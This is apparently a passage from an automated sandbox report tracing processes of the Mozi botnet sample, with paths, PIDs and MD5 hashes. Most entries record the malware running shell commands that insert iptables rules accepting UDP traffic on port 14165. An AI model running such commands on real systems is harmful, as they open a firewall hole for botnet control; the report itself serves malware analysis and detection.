                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 5204 Parent PID: 5202

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 5204 Parent PID: 5202

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 5205 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 5205 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 5207 Parent PID: 5205

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 5207 Parent PID: 5205

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 5208 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 5208 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 5211 Parent PID: 5208

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 5211 Parent PID: 5208

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 5220 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 5220 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p udp --dport 14165 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 5232 Parent PID: 5220

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 5232 Parent PID: 5220

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p udp --dport 14165 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 5254 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 5254 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 5268 Parent PID: 5254

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 5268 Parent PID: 5254

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 5290 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 5290 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 5303 Parent PID: 5290

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 5303 Parent PID: 5290

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 5326 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 5326 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 5333 Parent PID: 5326

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 5333 Parent PID: 5326

                                                                                                        General

                                                                                                        Start time:14:57:44
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: upstart PID: 4794 Parent PID: 3310

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/upstart
                                                                                                        Arguments:n/a
                                                                                                        File size:0 bytes
                                                                                                        MD5 hash:00000000000000000000000000000000

                                                                                                        Analysis Process: sh PID: 4794 Parent PID: 3310

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 4795 Parent PID: 4794

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: date PID: 4795 Parent PID: 4794

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/date
                                                                                                        Arguments:date
                                                                                                        File size:68464 bytes
                                                                                                        MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                        Analysis Process: sh PID: 4796 Parent PID: 4794

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: apport-checkreports PID: 4796 Parent PID: 4794

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/usr/share/apport/apport-checkreports
                                                                                                        Arguments:/usr/bin/python3 /usr/share/apport/apport-checkreports --system
                                                                                                        File size:1269 bytes
                                                                                                        MD5 hash:1a7d84ebc34df04e55ca3723541f48c9

                                                                                                        Analysis Process: upstart PID: 4821 Parent PID: 3310

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/upstart
                                                                                                        Arguments:n/a
                                                                                                        File size:0 bytes
                                                                                                        MD5 hash:00000000000000000000000000000000

                                                                                                        Analysis Process: sh PID: 4821 Parent PID: 3310

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 4822 Parent PID: 4821

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: date PID: 4822 Parent PID: 4821

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/date
                                                                                                        Arguments:date
                                                                                                        File size:68464 bytes
                                                                                                        MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                        Analysis Process: sh PID: 4823 Parent PID: 4821

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: apport-gtk PID: 4823 Parent PID: 4821

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/usr/share/apport/apport-gtk
                                                                                                        Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                        File size:23806 bytes
                                                                                                        MD5 hash:ec58a49a30ef6a29406a204f28cc7d87

                                                                                                        Analysis Process: upstart PID: 4848 Parent PID: 3310

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/upstart
                                                                                                        Arguments:n/a
                                                                                                        File size:0 bytes
                                                                                                        MD5 hash:00000000000000000000000000000000

                                                                                                        Analysis Process: sh PID: 4848 Parent PID: 3310

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 4849 Parent PID: 4848

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: date PID: 4849 Parent PID: 4848

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/date
                                                                                                        Arguments:date
                                                                                                        File size:68464 bytes
                                                                                                        MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                        Analysis Process: sh PID: 4866 Parent PID: 4848

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: apport-gtk PID: 4866 Parent PID: 4848

                                                                                                        General

                                                                                                        Start time:14:57:39
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/usr/share/apport/apport-gtk
                                                                                                        Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                        File size:23806 bytes
                                                                                                        MD5 hash:ec58a49a30ef6a29406a204f28cc7d87